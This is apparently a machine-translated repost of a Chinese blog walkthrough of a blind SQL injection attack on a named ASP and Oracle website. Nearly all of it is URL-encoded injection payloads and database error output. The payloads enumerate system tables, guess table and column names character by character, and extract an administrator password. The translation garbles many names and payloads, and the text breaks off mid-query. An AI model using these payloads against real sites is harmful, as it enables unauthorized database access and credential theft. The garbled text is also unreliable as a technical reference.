2. Tech
  3. Injection of ASP + ORACLE

Injection of ASP + ORACLE

xiaoxiao2021-03-06  69

An Injection of ASP ORACLE http://et.kpworld.com/star.asp?performer= 马三立; ----------------------- ------------------------------ ORAOLDB error '80040e14' ora-00911: Invalid Character /Star.asp, line 83 Description Filter the semicolon. Http://et.kpworld.com/star.asp?performer= Ma Sanli '------------------------------- -------------------- ORAOLDB error '80004005' ORA-01756: The string in parentheses does not end / Star.asp, line 83 seems unfiltered Single quotes issue. http://et.kpworld.com/star.asp?performer= Ma 3Re 'and' 1 '=' 1 ------------------------ ---------------------------------------- Close his single quotes, return. And 0 <> (Select Count (*) from admin) and '1' = '1 ------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------- ORAOLDB error '80040e37' ora-00942: Table or view does not exist /STAR.ASP, line 83 Description does not exist this table. ******************************************* ************************************************************************************ = 'Name ---------------------- Store the current user all table where table_name =' table name 'selectcolumn_name, from user_tab_columns ---------- --------------- Store all the columns where top_name = 'table name' and 0 <> (select count (*) from all_tables) and '1' = '1 ----- -------------------------------------------------- -------------- exists! All_tables is a system table that stores all tables of current ID and other users and 0 <> (Select Count (*) from user_tables) and '1' = '1 ------------ -------------------------------------------------- ------ return.

With this system table, this table stores all the tables of the current user and 0 <> (select top 1 table_name from user_tables) and '1' = '1 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------- ------------- Oraoledb error '80040e14' ora-00923: from keyword not found where expected /star.asp, line 83 does not support TOP 1? . . . . . This explanation is not ideal. . . (Top 1 has not been supported by PinKeyes testing 1) and 0 <> (Select Count (*) from user_tables where table_nam <>) and '1' = '1 ------------ -------------------------------------------------- ------------------------------ Oraoledb error '80040e14' ora-00904: Invalid Column name /star.asp, line 83 When the syntax error is displayed, the unlike column name and 0 <> (Select Count (*) from user_tables where table_name <> '') and '1' = '1 ------------- -------------------------------------------------- ----------------------------- syntax correctly, successfully returned to the logo, it seems that the four single quotes express empty. Next is right Some functions test: and 0 <> (Select Count (*) from user_tables where sum (table_name)> 1) and '1' = '1 ------------------ -------------------------------------------------- ---------------------------- Oraoledb error '80040e14' ora-00934: Group function is not allowed here /star.asp, line 83 Group functions are not allowed here. AND 0 <> (Select Count (*) from user_tables where avg (table_name)) and '1' = '1 ------------------------- -------------------------------------------------- ---------------- Oraoledb error '80040e14' ora-00934: Group function is not allowed here /star.asp, line 83 group function is not allowed here.

And 0 <> (SELECT TO_NAME) from user_tables) and% 20'1 '=' 1 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------- ORAOLEDB Error '80004005 'Ora-01427: Single-Row Subquery Returns More Than One Row /Star.asp, Row 83 Subride Query Returns more than one line and 0 <> (Select Count (*) from user_tables where table_name 1) and% 20' 1 '=' 1 --------------------------------------------- ---------------------------- ORAOLEDB error '80040E14' ORA-00920: Invalid Relational Operator /Star.asp, line 83 test Here, look at how to get his table: And 0 <> (Select Count (*) from Performer) and% 20'1 '=' 1 --------------- -------------------------------------- successfully returned. The table here is to see the previous URL guess. And 0 <> (Select Count (*) from user_tables where table_name = 'performer') And% 20'1 '=' 1 ------------ -------------------------------------------------- ----------------------- did not return. Failure sign. And% 200 <> (Select% 20count (*)% 20FROM% 20User_tables% 20where% 20table_name = 'performer') And% 20'1 '=' 1 -------------------------------------------------------------- -------------------------------------------------- ------------------------------ Success! It seems that this user_tables table only knows the uppercase letters! And 0 <> (Select Count (*) from user_tables where length> 10) And% 20'1 '=' 1 --------------------- -------------------------------------------------- ------------- Use the Length function to determine the number of digits of the longest table and 0 <> (select count (*) from user_tables where length = 18) and% 20'1 '= '1 ------------------------------------------------ ------------------------------------- 省 省 步, finally determine the longest table is 18.

And 0 <> (Select Count (*) from user_tables where substr (Table_name, 1, 1) = 'a') and% 20'1 '=' 1 --------------- -------------------------------------------------- ------------------------ First place is 'a', and 0 <> (Select Count (*) from user_tables where substr (Table_name, 1 , 2) = 'ad') and% 20'1 '=' 1 --------------------------------- -------------------------------------------------- ------ The second bit is 'ad' and 0 <> (select count (*) from user_tables where substr (Table_name, 1, 18) = 'admin /thorization') And% 20'1 '=' 1 - -------------------------------------------------- ----------------------------------------- 省 省, 18-bit named name 'Admin /thorization'. And 1 = (Select Count (*) from user_tables where table_name = 'admin torthorization') And% 20'1 '=' 1 ----------------------- -------------------------------------------------- ------------------- Return. AND 0 <> (Select Count (*) from user_tables where length = 2) and% 20'1 '=' 1 -------------------- -------------------------------------------------- ----------- Minimum table name length is 2 and% 200 <> (select% 20count (*)% 20FROM% 20User_tables% 20where% 20table_name% 20Like% 20 '% 25User% 25')% 20and % 20% 20'1 '=' 1 --------------------------------------------------------------------------------------------------- -------------------------------------------------- ------- did not return.

And% 200 <> (Select% 20count (*)% 20FROM% 20User_tables% 20where% 20table_name% 20Like% 20 '% 25ADMIN% 25')% 20And% 20'1 '=' 1 --------- -------------------------------------------------- -------------------------------------- And% 200 <> (Select% 20count (*) % 20FROM% 20User_tables% 20where% 20table_name% 20Like% 20 '% 25per% 25') And% 20'1 '=' 1 -------------------- -------------------------------------------------- ------------------------- and% 200 <> (Select% 20count (*)% 20WHERE% 20TABLES% 20where% 20table_name% 20Like% 20 ' % 25BBS% 25 ')% 20AND% 20'1' = '1 ---------------------------------- -------------------------------------------------- ------------- successfully returned. It seems that you can use Like guess. And% 200 <> (Select% 20count (*)% 20FROM% 20User_tables% 20where% 20Table_name% 20Like '% 25bbs% 25'% 20and% 20Length (Table_name)> 8) And% 20'1 '=' 1 --- -------------------------------------------------- ------------------------------------------ And% 200 <> SELECT% 20count (*)% 20FROM% 20User_Tables% 20where% 20table_name% 20Like '% 25bbs% 25'% 20and% 20Length (Table_name)> 10)% 20And% 20'1 '=' 1 -------------- -------------------------------------------------- -------------------------------------- And% 200 <> (SELECT% 20count (* )% 20FROM% 20User_tables% 20where% 20table_name% 20like '% 25bbs% 25'% 20and% 20LENGTH (Table_name) = 10)% 20And% 20'1 '=' 1 ------------- -------------------------------------------------- ---------------------------------- Use Like and Length combination to guess, you can determine the length immediately.

And% 200 <> (Select% 20count (*)% 20FROM% 20User_tables% 20where% 20SUBSTR (Table_name, 1, 4) = 'bbss')% 20And% 20'1 '=' 1 --------- -------------------------------------------------- --------------------------------------- Guess the fourth place S. Next, it is repeated labor. And% 200 <> (Select% 20count (*)% 20FROM% 20User_Tables% 20where% 20SUBSTR (Table_name, 1, 10) = 'bbssubject')% 20and% 20'1 '=' 1 -------- -------------------------------------------------- -------------------------------------- guess. 'Bbssubject' and% 200 <> (select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'bbssubject'% 20Like% 20 Column_name% 20Like% 20 '% 25User% 25')% 20And% 20'1 '= '1 ------------------------------------------------ ------------------------------------------------------------------------------ % 200 <> (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'bbssubject'% 20And% 20Column_name% 20Like% 20 '% 25User% 25')% 20And% 20'1 '=' 1 - -------------------------------------------------- --------------------------------------------- did not return, not like It is a table that saves the user and password. Come again. . .

And% 200 <> (*)% 20FROM% 20User_tables% 20where% 20table_name% 20Like% 20 '% 25User% 25')% 20And% 20'1 '=' 1 --------- -------------------------------------------------- -------------------------------------- And% 200 <> (Select% 20count (*) % 20FROM% 20User_tables% 20where% 20table_name% 20Like% 20 '% 25User% 25'% 20And% 20Length (Table_name)> 10)% 20And% 20'1 '=' 1 ------------ -------------------------------------------------- ---------------------------------- And% 200 <> (select% 20count (*)% 20FROM% 20User_tables% 20where% 20table_name% 20Like% 20 '% 25User% 25'% 20and% 20LENGTH (Table_name)> 15)% 20And% 20'1 '=' 1 --------------- -------------------------------------------------- -------------------------------- And% 200 <> (Select% 20count (*)% 20FROM% 20User_tables% 20where % 20TABLE_NAME% 20Like% 20 '% 25User% 25'% 20and% 20LENGTH (Table_name) = 15)% 20And% 20'1 '=' 1 ------------------ -------------------------------------------------- ---------------------------- Determine the length of 15.

And% 200 <> (Select% 20count (*)% 20FROM% 20User_Tables% 20where% 20SUBSTR (Table_name, 1, 1) = 'u'% 20ance% 20LENGTH (Table_name) = 15)% 20AND% 20'1 '=' 1 ------------------------------------------------- ------------------------------------------------ And% 200 <> (Select% 20count (*)% 20FROM% 20User_tables% 20where% 20Substr (Table_Name, 2, 1) = 's'% 20and% 20Length (Table_Name) = 15)% 20And% 20'1 '=' 1 - -------------------------------------------------- -------------------------------------------- And% 200 < > (Select% 20count (*)% 20FROM% 20User_tables% 20where% 20SUBSTR (Table_name, -4, 4) = 'user'% 20And% 20Length 20And% 20'1 '=' 1 - -------------------------------------------------- -------------------------------------------- And% 200 <> (Select% 20count (*)% 20FROM% 20User_Tables% 20where% 20Length 20And% 20SUBSTR (Table_name, -15, 15) = 'unsubscribeuser')% 20And% 20'1 '=' 1 --- -------------------------------------------------- ------------------------------------------ And% 200 <> SELECT% 20count (*)% 20From% 20User_tables% 20where% 20 Table_name = 'unsubscribescribeuser')% 20and% 20'1 '=' 1 ---------------------------------- -------------------------------------------------- ------------ Determine the name 'unsubscribeuser', then guess if there is a password field. . .

And% 200 <> (Select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'unsubscribeUser'% 20Like% 20 Column_name% 20Like% 20 '% 25User% 25')% 20And% 20'1 '=' 1 - -------------------------------------------------- -------------------------------------------- And% 200 < > (SELECT% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'unsubscribeUser'% 20Like% 20 '% 25Pass% 25')% 20And% 20'1 '=' 1 ----- -------------------------------------------------- ------------------------------------------ Like Pass, did not return, depressed, carry on. And% 200 <> (*)% 20FROM% 20User_tab_columns% 20where% 20Column_name% 20Like% 20 '% 25Pass% 25'% 20ance% 20Length = 13)% 20And% 20'1 '=' 1 -------------------------------------------------- ------------------------------------------------- Return. Inaccurate.

-------------------------------------------------- ---------------------------------------------- And% 200 <> (Select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20SUBSTR (Column_name, -2, 2) = 's') And% 20'1 '=' 1 ----------- -------------------------------------------------- ------------------------------------ And% 200 <> (select% 20count (*)% 20FROM % 20User_tab_columns% 20where% 20Substr (Column_Name, 6, 2) = 's')% 20And% 20'1 '=' 1 ---------------------- -------------------------------------------------- ------------------------- and% 200 <> (select% 20count (*)% 20FROM% 20where_tab_columns% 20where% 20SUBSTR (Column_name, 4, 4) = 'pass') and% 20'1 '=' 1 -------------------------------- -------------------------------------------------- ------------- Here with SubStr. And% 200 <> (select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20SUBSTR (Column_name, 4, 4) = 'pass' % 20AND% 20Length (Column_name) = 11)% 20And% 20'1 '=' 1 -------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------- --------------- The field length of the PASS field is 11 bits. According to the 4 digits from 4 digits, it is 3 digits before PASS, and then 4 digits, a total of 11 bits. And% 200 <> (Select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20SUBSTR (Column_Name, 4, 8) = 'password')% 20And% 20'1 '=' 1 -------- -------------------------------------------------- --------------------------------------- Guess, it is really. . .

And% 200 <> (Select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20SUBSTR (Column_name, -11 ,11) = 'strpassword')% 20and% 20'1 '=' 1 ------- -------------------------------------------------- ---------------------------------------- And% 200 <> (SELECT% 20count) *)% 20FROM% 20User_tab_columns% 20where% 20Column_name = 'strpassword')% 20And% 20'1 '=' 1 ------------------------- -------------------------------------------------- ---------------------- And% 200 <> (Select% 20count (*)% 20FROM% 20User_Tab_columns% 20where% 20Column_name = 'strpassword'% 20and% 20LENGTH (Table_name) = 13) -------------------------------------------- -------------------------------------------------- --- and% 200 <> (Select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20COLUMN_NAME = 'strpassword'% 20and% 20LENGTH (Table_name) = 13)% 20and% 20'1 '=' 1 --- -------------------------------------------------- ------------------------------------------- Full return, determine the password field Name 'strpassword'. Catch the password field, then use him to grasp the table name: And% 200 <> (select% 20count (*)% 20FROM% 20User_tab_column_name = 'strpassword'% 20ance% 20Length (Table_Name) = 13 ) and '1' = '1 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------------- ----- Return, and the length of the table name guess is in line with.

Gue his name with SUBSTR: and% 200 <> (Select% 20count (*)% 20FROM% 20User_Tab_column_name = 'strpassword'% 20and% 20SUBSTR (Table_Name, 1, 13) = 'administrator') and '1 '=' 1 ---------------------------------------------- -------------------------------------------------- - And% 200 <> (Select% 20count (*)% 20FROM% 20User_TAB_COLUMNS% 20where% 20Column_name = 'strpassword'% 20and% 20table_name = 'administrator') and '1' = '1 --------- -------------------------------------------------- -------------------------------------- And% 200 <> (Select% 20count (*) % 20FROM% 20User_tables% 20where% 20table_name = 'administrator') and '1' = '1 ------------------------------------------------------------------------------------------------------------ -------------------------------------------------- ---------------- Full return, determine the name: 'administrator'. And% 208 = (select% 20count (*)% 20FM% 20User_tab_columns% 20where% 20table_name = ' Administrator ') And' 1 '=' 1 ---------------------------------------- -------------------------------------------------- ------- Guess 8 fields in the table.

And% 200 <> (Select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'administrator'% 20R% 20Column_name% 20Like% 20 '% 25ID% 25')% 20And% 20'1 '=' 1 - -------------------------------------------------- -------------------------------------------- And% 203 = (SELECT% 20count (*)% 20FROM% 20Administrator) and '1' = '1 ------------------------------- -------------------------------------------------- ---------------- And% 200 <> (Select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'administrator'% 20And% 20SUBSTR (Column_name, 4, 2 ) = 'ID')% 20'1 '=' 1 ---------------------------------- -------------------------------------------------- ------------- and% 200 <> (Select% 20count (*)% 20FROM% 20Where_Tab_columns% 20where% 20table_name = 'administrator'% 20and% 20SUBSTR (Column_Name, -2, 2) = 'ID')% 20And% 20'1 '=' 1 ------------------------------------ -------------------------------------------------- ----------- It can be judged that the ID end is ended, and the length is 5. And% 200 <> (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'administrator'% 20and% 20SUBSTR (Column_name, -5, 5) = 'LNGID')% 20And% 20'1 '=' 1 ------------------------------------------------- ------------------------------------------------ And% 200 <> (select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'administrator'% 20and% 20Column_name = 'lngid')% 20And% 20'1 '=' 1 --------- -------------------------------------------------- -------------------------------------- came out, LNGID.

And% 200 <> (Select% 20count (*)% 20FROM% 20Administrator% 20where% 20LENGTH (LNGID) = 2)% 20And% 20'1 '=' 1 -------------- -------------------------------------------------- -------------------------------- And% 208 = (Select% 20min (LNGID)% 20FROM% 20Administrator)% 20AND% 20'1 '=' 1 --------------------------------------- -------------------------------------------------- ------ And% 2021 = (SELECT% 20max (LNGID)% 20FROM% 20Administrator)% 20And% 20'1 '=' 1 ------------------ -------------------------------------------------- ----------------------------- minimum ID, the biggest ID is also coming out, next to get your password: and% 200 <> (SELECT% 20count (*)% 20FROM% 20Administrator% 20where% 20Length (strpassword) = 4% 20And% 20LNGID = 8)% 20And% 20'1 '=' 1 ---------------- -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- )% 20FROM% 20Administrator% 20where% 20ASCII (SUBSTR (strpassword, 1, 1)) = 116% 20And% 20LNGID = 8)% 20And% 20'1 '=' 1 ------------ -------------------------------------------------- ----------------------------------- One and% 200 <> (Select% 20count (*)% 20FROM% 20Administrator% 20where% 20ASCII (SUBSTR (Strpassword, 2, 1)) = 101% 20And% 20LNGID = 8)% 20And% 20'1 '=' 1 ------------------------------------------------- -------------------------------------------------- Second Bits and% 200 <> (Select% 20count (*)% 20FROM% 20Administrator% 20where% 20ASCII (SUBSTR (Strpassword, 3, 1)) = 115% 20And% 20LNGID = 8)% 20And% 20'1 '=' 1 -------------------------------------------------- ----------------------------------------------- the third And% 200 <>

(SELECT% 20count (*)% 20FM% 20Administrator% 20where% 20ASCII (SUBSTR (Strpassword, 4, 1)) = 116% 20And% 20LNGID = 8)% 20And% 20'1 '=' 1 -------- -------------------------------------------------- ----------------------------------------- Fourth StrPassword: test and% 200 <> (Select% 20count (*)% 20FROM% 20Administrator% 20where% 20StrPassword = 'test'% 20And% 20LNGID = 8)% 20And% 20'1 '=' 1 ------------ -------------------------------------------------- ----------------------------------- OH, YEAH ~~ The password came out.

Then younger Name: And% 200 <> (Select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'administrator'% 20Like% 20Column_name% 20Like% 20 '% 25name% 25')% 20And% 20'1 '=' 1 ---------------------------------------------- -------------------------------------------------- - and% 200 <> (Select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'administrator'% 20and% 20SUBSTR (Column_Name, 4, 4) = 'Name')% 20And% 20'1 '=' 1 ------------------------------------------------- ------------------------------------------------ And% 200 <> (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'administrator'% 20and% 20SUBSTR (Column_name, -4, 4) = 'Name')% 20And% 20'1 '=' 1 - -------------------------------------------------- -------------------------------------------- And% 200 < > (SELECT% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20table_name = 'administrator'% 20and% 20SUBSTR (Column_name, 1, 7) = 'strname')% 20'1 '=' 1 ---- -------------------------------------------------- ------------------------------------------ come out, field: ST RNAME AND% 200 <> (Select% 20count (*)% 20FROM% 20WHER_TAB_COLUMNS% 20where% 20table_name = 'administrator'% 20Name 20Column_name% 20Not% 20IN ('strname', 'strpassword', 'lngid')% 20And% 20'1 '=' 1 ------------------------------------------- -------------------------------------------------- ---- And% 200 <> (Select% 20count (*)% 20FROM% 20Administrator% 20where% 20StrPassword = 'test'% 20and% 20LNGID = 8% 20and% 20LENGTH (STRNAME) = 4)% 20And% 20'1 '='

转载请注明原文地址:https://www.9cbs.com/read-90614.html

9cbs

New Post(0)